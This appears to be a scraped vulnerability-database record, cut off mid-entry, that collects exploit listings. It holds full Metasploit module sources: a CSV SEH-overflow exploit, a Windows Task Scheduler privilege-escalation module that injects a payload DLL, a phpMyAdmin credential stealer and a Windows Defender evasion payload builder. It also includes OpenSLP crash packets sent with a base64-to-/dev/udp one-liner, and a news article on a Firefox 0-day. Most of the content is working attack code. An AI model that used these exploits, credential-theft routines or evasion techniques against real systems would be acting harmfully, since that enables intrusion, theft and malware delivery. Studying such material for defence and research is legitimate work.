This results in overwriting a structured exception handler record.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f3ci', # initial discovery\n 'modpr0be' # poc and Metasploit Module\n ],\n 'References' =>\n [\n [ 'CVE', '2018-17408' ],\n [ 'EDB', '45505' ]\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Zahir Enterprise Plus 6 <= build 10b',\n {\n #P/P/R from vclie100.bpl (C:\\Program Files\\Zahir Personal 6 - Demo Version\\vclie100.bpl)\n 'Ret' => 0x52016661,\n 'Offset' => 3041\n }\n ]\n ],\n 'Payload' =>\n {\n 'Space' => 5000,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x22\\x2c\",\n 'DisableNops' => true\n },\n 'DisclosureDate' => 'Sep 28 2018',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv'])\n ])\n end\n\n def exploit\n buf = rand_text_alpha_upper(target['Offset'])\n buf << \"\\r\\n\" # crash chars\n buf << rand_text_alpha_upper(380) # extra chars to hit the offset\n buf << generate_seh_record(target.ret)\n buf << payload.encoded\n\n file_create(buf)\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb"}, {"lastseen": "2019-10-30T23:07:55", "bulletinFamily": "exploit", "description": "On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to `.job` files located in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file. 
WARNING: The PrintConfig.dll (%windir%\\system32\\driverstor\\filerepository\\prnms003*) on the target host will be overwritten when the exploit runs. This module has been tested against Windows 10 Pro x64.\n", "modified": "2018-09-27T02:13:37", "published": "2018-09-13T23:00:20", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/ALPC_TASKSCHEDULER", "href": "", "type": "metasploit", "title": "Microsoft Windows ALPC Task Scheduler Local Privilege Elevation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\nrequire 'msf/core/post/windows/registry' #TODO: Do we need this?\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',\n 'Description' => %q(\n On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented\n by the task scheduler service can be used to write arbitrary DACLs to `.job` files located\n in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this\n location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be\n created to a file the user has read access to. 
After creating a hardlink, the vulnerability\n can be triggered to set the DACL on the linked file.\n\n WARNING:\n The PrintConfig.dll (%windir%\\system32\\driverstor\\filerepository\\prnms003*) on the target host\n will be overwritten when the exploit runs.\n\n This module has been tested against Windows 10 Pro x64.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'SandboxEscaper', # Original discovery and PoC\n 'bwatters-r7', # msf module\n 'asoto-r7', # msf module\n 'Jacob Robles' # msf module\n ],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows 10 x64', { 'Arch' => ARCH_X64 }]\n ],\n 'References' =>\n [\n ['CVE', '2018-8440'],\n ['URL', 'https://github.com/SandboxEscaper/randomrepo/'],\n ],\n 'Notes' =>\n {\n # Exploit overwrites PrintConfig.dll, which makes it unusable.\n 'Stability' => [ OS_RESOURCE_LOSS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n },\n 'DisclosureDate' => 'Aug 27 2018',\n 'DefaultTarget' => 0,\n ))\n\n register_options([OptString.new('PROCESS',\n [false, 'Name of process to spawn and inject dll into.', nil])\n ])\n end\n\n def setup_process(process_name)\n begin\n print_status(\"Launching #{process_name} to host the exploit...\")\n launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)\n process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. 
Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def inject_magic(process, payload_dll)\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')\n library_path = ::File.expand_path(library_path)\n dll_data = ''\n ::File.open(library_path, 'rb') { |f| dll_data = f.read }\n\n print_status(\"Writing payload dll into process #{process.pid} memory\")\n payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)\n written = process.memory.write(payload_addr, payload_dll)\n\n if written != payload_dll.length\n fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')\n end\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n exploit_mem, offset = inject_dll_data_into_process(process, dll_data)\n process.thread.create(exploit_mem + offset, payload_addr)\n end\n\n def validate_active_host\n sysinfo['Computer']\n true\n rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n false\n end\n\n def validate_target\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n\n if sysinfo['OS'] =~ /XP/\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n end\n\n def exploit\n unless session.type == 'meterpreter'\n fail_with(Failure::None, 'Only meterpreter sessions are supported')\n end\n\n payload_dll = generate_payload_dll\n process_name = datastore['PROCESS'] || 'notepad.exe'\n\n print_status('Checking target...')\n unless validate_active_host\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n validate_target\n\n print_status(\"Target Looks Good... 
trying to start #{process_name}\")\n process = setup_process(process_name)\n inject_magic(process, payload_dll)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n print_error(e.message)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/alpc_taskscheduler.rb"}, {"lastseen": "2019-11-19T17:30:26", "bulletinFamily": "exploit", "description": "This module gathers Phpmyadmin creds from target linux machine.\n", "modified": "2018-09-07T16:13:09", "published": "2018-08-19T18:10:19", "id": "MSF:POST/LINUX/GATHER/PHPMYADMIN_CREDSTEAL", "href": "", "type": "metasploit", "title": "Phpmyadmin credentials stealer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Phpmyadmin credentials stealer\",\n 'Description' => %q{\n This module gathers Phpmyadmin creds from target linux machine.\n },\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['meterpreter'],\n 'Author' => [\n 'Chaitanya Haritash [bofheaded]',\n 'Dhiraj Mishra <dhiraj@notsosecure.com>'\n ]\n ))\n end\n\n def parse_creds(contents)\n db_user = contents.scan(/\\$dbuser\\s*=\\s*['\"](.*)['\"];/).flatten.first\n db_pass = contents.scan(/\\$dbpass\\s*=\\s*['\"](.*)['\"];/).flatten.first\n\n unless db_user && db_pass\n print_error(\"Couldn't find PhpMyAdmin credentials\")\n return\n end\n\n print_good(\"User: #{db_user}\")\n print_good(\"Password: #{db_pass}\")\n\n print_status(\"Storing 
credentials...\")\n store_valid_credential(user: db_user, private: db_pass)\n end\n\n def run\n print_line(\"\\nPhpMyAdmin Creds Stealer!\\n\")\n\n if session.platform.include?(\"windows\")\n print_error(\"This module is not compatible with windows\")\n return\n end\n\n conf_path = \"/etc/phpmyadmin/config-db.php\"\n unless file_exist?(conf_path)\n print_error(\"#{conf_path} doesn't exist on target\")\n return\n end\n\n print_good('PhpMyAdmin config found!')\n res = read_file(conf_path)\n unless res\n print_error(\"You may not have permissions to read the file.\")\n return\n end\n\n print_good(\"Extracting creds\")\n parse_creds(res)\n\n p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')\n print_good(\"Config file located at #{p}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/phpmyadmin_credsteal.rb"}, {"lastseen": "2019-12-09T18:28:56", "bulletinFamily": "exploit", "description": "This module allows you to generate a Windows EXE that evades against Microsoft Windows Defender. Multiple techniques such as shellcode encryption, source code obfuscation, Metasm, and anti-emulation are used to achieve this. 
For best results, please try to use payloads that use a more secure channel such as HTTPS or RC4 in order to avoid the payload network traffic getting caught by antivirus better.\n", "modified": "2018-10-06T21:04:07", "published": "2018-08-02T16:54:38", "id": "MSF:EVASION/WINDOWS/WINDOWS_DEFENDER_EXE", "href": "", "type": "metasploit", "title": "Microsoft Windows Defender Evasive Executable", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/compiler/windows'\n\nclass MetasploitModule < Msf::Evasion\n\n def initialize(info={})\n super(merge_info(info,\n 'Name' => 'Microsoft Windows Defender Evasive Executable',\n 'Description' => %q{\n This module allows you to generate a Windows EXE that evades against Microsoft\n Windows Defender. Multiple techniques such as shellcode encryption, source code\n obfuscation, Metasm, and anti-emulation are used to achieve this.\n\n For best results, please try to use payloads that use a more secure channel\n such as HTTPS or RC4 in order to avoid the payload network traffic getting\n caught by antivirus better.\n },\n 'Author' => [ 'sinn3r' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Targets' => [ ['Microsoft Windows', {}] ]\n ))\n end\n\n def rc4_key\n @rc4_key ||= Rex::Text.rand_text_alpha(32..64)\n end\n\n def get_payload\n @c_payload ||= lambda {\n opts = { format: 'rc4', key: rc4_key }\n junk = Rex::Text.rand_text(10..1024)\n p = payload.encoded + junk\n\n return {\n size: p.length,\n c_format: Msf::Simple::Buffer.transform(p, 'c', 'buf', opts)\n }\n }.call\n end\n\n def c_template\n @c_template ||= %Q|#include <Windows.h>\n#include <rc4.h>\n\n// The encrypted code allows us to get around static scanning\n#{get_payload[:c_format]}\n\nint main() {\n int lpBufSize = sizeof(int) * #{get_payload[:size]};\n LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, 
MEM_COMMIT, 0x00000040);\n memset(lpBuf, '\\\\0', lpBufSize);\n\n HANDLE proc = OpenProcess(0x1F0FFF, false, 4);\n // Checking NULL allows us to get around Real-time protection\n if (proc == NULL) {\n RC4(\"#{rc4_key}\", buf, (char*) lpBuf, #{get_payload[:size]});\n void (*func)();\n func = (void (*)()) lpBuf;\n (void)(*func)();\n }\n\n return 0;\n}|\n end\n\n def run\n vprint_line c_template\n # The randomized code allows us to generate a unique EXE\n bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)\n print_status(\"Compiled executable size: #{bin.length}\")\n file_create(bin)\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/evasion/windows/windows_defender_exe.rb"}], "threatpost": [{"lastseen": "2019-11-04T07:09:59", "bulletinFamily": "info", "description": "UPDATE\n\nMozilla has fixed a high-severity vulnerability in its Firefox browser being actively exploited in the wild.\n\nThe vulnerability (CVE-2019-11708) is separate from a [critical flaw under active attack](<https://threatpost.com/mozilla-patches-firefox-critical-flaw-under-active-attack/145814/>) that was patched earlier this week ([CVE-2019-11707](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11707>)). However, both vulnerabilities were discovered by Coinbase Security, who said that the flaws were being used in active spear phishing attacks targeting Coinbase employees.\n\nThe high-severity sandbox-escape flaw stems from insufficient vetting of \u201cPrompt:Open\u201d inter process communication (IPC) messages, which are passed between different processes on the browser. 
The flaw \u201ccan result in the non-sandboxed parent process opening web content chosen by a compromised child process,\u201d according to Mozilla\u2019s [advisory](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWhen combined with additional vulnerabilities this could result in executing arbitrary code on the user\u2019s computer,\u201d according to Mozilla.\n\nMozilla said that Firefox 67.0.4 and Firefox ESR 60.7.2 fix the issue.\n\nCoinbase chief information security officer Philip Martin[ said on Twitter,](<https://twitter.com/SecurityGuyPhil/status/1141466335592869888>) Wednesday, that Coinbase had spotted both this high-severity flaw, as well as the critical flaw patched earlier this week, being exploited by an attacker who was targeting Coinbase employees.\n\nMartin said he has seen no evidence of attacks targeting Coinbase customers \u2013 and that Coinbase was not the only cryptocurrency organization targeted in the campaign.\n\n> 3/ We\u2019ve seen no evidence of exploitation targeting customers. We were not the only crypto org targeted in this campaign. We are working to notify other orgs we believe were also targeted. 
We\u2019re also releasing a set of IOCs that orgs can use to evaluate their potential exposure.\n> \n> \u2014 Philip Martin (@SecurityGuyPhil) [June 19, 2019](<https://twitter.com/SecurityGuyPhil/status/1141466337639747584?ref_src=twsrc%5Etfw>)\n\n\u201cWe walked back the entire attack, recovered and reported the 0-day to firefox, pulled apart the malware and infra used in the attack and are working with various orgs to continue burning down attacker infrastructure and digging into the attacker involved,\u201d he said on Twitter.\n\nMartin said that a more detailed analysis will be released next week.\n\nThe critical flaw patched earlier this week ([CVE-2019-11707](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11707>)) is a type confusion vulnerability in the Array.pop, which is an array method that is used in JavaScript objects in Firefox. The vulnerability, under active attack, enables bad actors to take full control of systems running the vulnerable Firefox versions.\n\nTor Browser also [updated to version 8.5.2](<https://threatpost.com/tor-browser-update-critical-flaw/145857/>) in response to the critical Firefox flaw (The issue affects Tor, since, as its founders said back in 2016, Firefox is at the heart of the privacy-focused onion browser).\n\n\u201cOn Monday, June 17, 2019, Coinbase reported a vulnerability used as part of targeted attacks for a spear phishing campaign,\u201d Selena Deckelmann, senior director of Firefox Browser Engineering, told Threatpost. 
\u201cIn less than 24 hours, we released a fix for the exploit.\u201d\n\n_This article was updated on June 26 at 8am to reflect the correct CVE for the vulnerability, CVE-2019-11708 (not CVE-2019-11709)._\n", "modified": "2019-06-21T15:22:23", "published": "2019-06-21T15:22:23", "id": "THREATPOST:BA5F8412B5B698E2CD2642F255B022AC", "href": "https://threatpost.com/mozilla-fixes-second-actively-exploited-firefox-flaw/145893/", "type": "threatpost", "title": "Mozilla Fixes Second Actively-Exploited Firefox Flaw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-11-10T02:18:49", "bulletinFamily": "exploit", "description": "", "modified": "2018-11-09T00:00:00", "published": "2018-11-09T00:00:00", "id": "PACKETSTORM:150240", "href": "https://packetstormsecurity.com/files/150240/OpenSLP-2.0.0-Out-Of-Bounds.html", "title": "OpenSLP 2.0.0 Out-Of-Bounds", "type": "packetstorm", "sourceData": "` _ _ \n/ | ___ ___ ___ ___ ___| |___ \n_ / / | . | . | -_| |_ -| | . | \n|_|_/ |___| _|___|_|_|___|_| _| \n|_| |_| \n \n2018-11-07 \n \nMORE BUGS IN OPENSLP-2.0.0 \n========================== \n \nI discovered some bugs in openslp-2.0.0 back in January, 2018. \nOne of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free), \nand today I'm disclosing two more. \n \n \nBUG 1 \n===== \n \nThis issue is an OOB read that does not crash the application. \nSo in terms of exploitation it is not very interesting. If that's what \nyou're here for then scroll down to bug#2. \nAfter the occurence of the bug the application actually detects the error \nand ignores the malicious packet. Therefore, it could be argued that this \nis not a bug at all. 
Nevertheless, here it is: \n \nProof of concept exploit: \n \necho -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d > /dev/udp/127.0.0.1/427 \n \nValgrind report: \n \n==27968== Invalid read of size 1 \n==27968== at 0x412436: GetUINT16 (slp_message.c:63) \n==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327) \n==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005) \n==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393) \n==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) \n==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) \n==27968== by 0x40256B: main (slpd_main.c:699) \n==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd \n==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296) \n==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67) \n==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139) \n==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383) \n==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) \n==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) \n==27968== by 0x40256B: main (slpd_main.c:699) \n \nAnalysis: \n \nv2ParseSrvReg is responsible for parsing incoming requests. Various bytes \nare read from the packet and interpreted as integers used as length fields. \nOne of them is the scopelistlen, parsed on line 321, and further used as \nargument for the amount of bytes to increment the buffer->curpos pointer \nin the the GetStrPtr function, shown below on line 112. It now points to \nuninitialized memory. \n \nThe OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos \npointer is dereferenced. \n \nSubsequently the comparison on line 329 evaluates to true since the \nbuffer->curpos now points to memory located after the buffer->end \npointer. The application therefore stops processing the malicious packet. 
\n \n291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg) \n292 { \n293 int result; \n294 \n295 /* 0 1 2 3 \n296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 \n297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n298 | <URL-Entry> \\ \n299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n300 | length of service type string | <service-type> \\ \n301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n302 | length of <scope-list> | <scope-list> \\ \n303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n304 | length of attr-list string | <attr-list> \\ \n305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\\ \n307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */ \n308 \n309 /* Parse the <URL-Entry>. */ \n310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry); \n311 if (result != 0) \n312 return result; \n313 \n314 /* Parse the <service-type> string. */ \n315 srvreg->srvtypelen = GetUINT16(&buffer->curpos); \n316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen); \n317 if (buffer->curpos > buffer->end) \n318 return SLP_ERROR_PARSE_ERROR; \n319 \n320 /* Parse the <scope-list> string. */ \n321 srvreg->scopelistlen = GetUINT16(&buffer->curpos); \n322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen); \n323 if (buffer->curpos > buffer->end) \n324 return SLP_ERROR_PARSE_ERROR; \n325 \n326 /* Parse the <attr-list> string. */ \n327 srvreg->attrlistlen = GetUINT16(&buffer->curpos); \n328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen); \n329 if (buffer->curpos > buffer->end) \n330 return SLP_ERROR_PARSE_ERROR; \n \n54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word. \n55 * \n56 * @param[in,out] cpp - The address of a pointer from which to extract. 
\n57 * \n58 * @return A 16-bit unsigned value in native format; the buffer pointer \n59 * is moved ahead by 2 bytes on return. \n60 */ \n61 uint16_t GetUINT16(uint8_t ** cpp) \n62 { \n63 uint16_t rv = AS_UINT16(*cpp); \n64 *cpp += 2; \n65 return rv; \n66 } \n... \n96 /** Extract a string buffer address into a character pointer. \n97 * \n98 * Note that this routine doesn't actually copy the string. It only casts \n99 * the buffer pointer to a character pointer and moves the value at @p cpp \n100 * ahead by @p len bytes. \n101 * \n102 * @param[in,out] cpp - The address of a pointer from which to extract. \n103 * @param[in] len - The length of the string to extract. \n104 * \n105 * @return A pointer to the first character at the address pointed to by \n106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes \n107 * on return. \n108 */ \n109 char * GetStrPtr(uint8_t ** cpp, size_t len) \n110 { \n111 char * sp = (char *)*cpp; \n112 *cpp += len; \n113 return sp; \n114 } \n \n \nProof of discovery: \n \n$ echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d | sha256sum \n0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 - \n \ntwitter.com/magnusstubman/status/953909628622069760 \n \n \nPatch: \n \nI'm not aware of any patch, and I'm not sure the maintainers are going to patch it. \n \nBUG 2 \n===== \n \nFirst and foremost, I'm not claiming credit for this bug since it was \napparently discovered by Reno Robert and publicly disclosed on the \noss-security mailing list on 2016-09-27 and awarded CVE-2016-7567 \nthe day after. \n \nopenwall.com/lists/oss-security/2016/09/27/4 \nopenwall.com/lists/oss-security/2016/09/28/1 \n \nAnyhow, I wasn't aware of the issue and found it by fuzzing, so I \nreported it to the maintainers who made me aware of the earlier discovery. \nWhat puzzled me was that no announcement had been made and the fact that \nthe latest stable version on their website is still vulnerable! 
I found it \n2017-12-06 and reported it 2018-01-18. See further down for proof of \ndiscovery. \n \nI havn't been able to find any exploit for this bug anywhere. Therefore, \nI'm today disclosing a proof-of-concept exploit for the bug to increase \nattention on the issue. \n \nExploit: \n \necho -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d > /dev/udp/127.0.0.1/427 \n \nValgrind report: \n \n==56913== Invalid write of size 1 \n==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914) \n==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210) \n==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374) \n==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) \n==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) \n==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) \n==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) \n==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) \n==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) \n==56913== by 0x402383: main (slpd_main.c:699) \n==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd \n==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296) \n==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356) \n==56913== by 0x410096: SLPCompareString (slp_compare.c:365) \n==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) \n==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) \n==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) \n==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) \n==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) \n==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) \n==56913== by 
0x402383: main (slpd_main.c:699) \n \nThe while loop on line 207 fails to perform bounds checking, and as such \nmay end up incrementing the pointer p up to a point such that p is bigger \nthan ep. Thus, the third argument to memmove on line 2010 becomes negative. \nHowever, since memmove accepts a size_t (which is unsigned) the value wraps \naround and becomes UINT_MAX or close to UINT_MAX resulting in memmove \nattempting to move an excessive amount of memory, resulting in OOB write. \n \n184 /** fold internal white space within a string. \n185 * \n186 * folds all internal white space to a single space character within a \n187 * specified string. modified the @p str parameter with the result and \n188 * returns the new length of the string. \n189 * \n190 * @param[in] len - the length in bytes of @p str. \n191 * @param[in,out] str - the string from which extraneous white space \n192 * should be removed. \n193 * \n194 * @return the new (shorter) length of @p str. \n195 * \n196 * @note this routine assumes that leading and trailing white space have \n197 * already been removed from @p str. \n198 */ \n199 static int slpfoldwhitespace(size_t len, char * str) \n200 { \n201 char * p = str, * ep = str + len; \n202 while (p < ep) \n203 { \n204 if (isspace(*p)) \n205 { \n206 char * ws2p = ++p; /* point ws2p to the second ws char. */ \n207 while (isspace(*p)) /* scan till we hit a non-ws char. */ \n208 p++; \n209 len -= p - ws2p; /* reduce the length by extra ws. */ \n210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. 
*/ \n211 } \n212 p++; \n213 } \n214 return (int)len; \n215 } \n \nProof of discovery: \n \n$ echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d | sha256sum \n5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 - \n \ntwitter.com/magnusstubman/status/938317849474555904 \n \nPatch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \n \nREFERENCES \n========== \n \n- sourceforge.net/p/openslp/bugs/161 \n- sourceforge.net/p/openslp/bugs/160 \n- twitter.com/magnusstubman/status/938317849474555904 \n- twitter.com/magnusstubman/status/953909628622069760 \n- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \n- openwall.com/lists/oss-security/2016/09/27/4 \n- openwall.com/lists/oss-security/2016/09/28/1 \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150240/openslp200-oob.txt"}, {"lastseen": "2018-10-13T02:13:21", "bulletinFamily": "exploit", "description": "", "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "PACKETSTORM:149776", "href": "https://packetstormsecurity.com/files/149776/Phoenix-Contact-WebVisit-2985725-Authentication-Bypass.html", "title": "Phoenix Contact WebVisit 2985725 Authentication Bypass", "type": "packetstorm", "sourceData": "`# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass \n# Date: 2018-09-30 \n# Exploit Author: Deneut Tijl \n# Vendor Homepage: www.phoenixcontact.com \n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5 \n# Version: WebVisit (all versions) \n# CVE : 
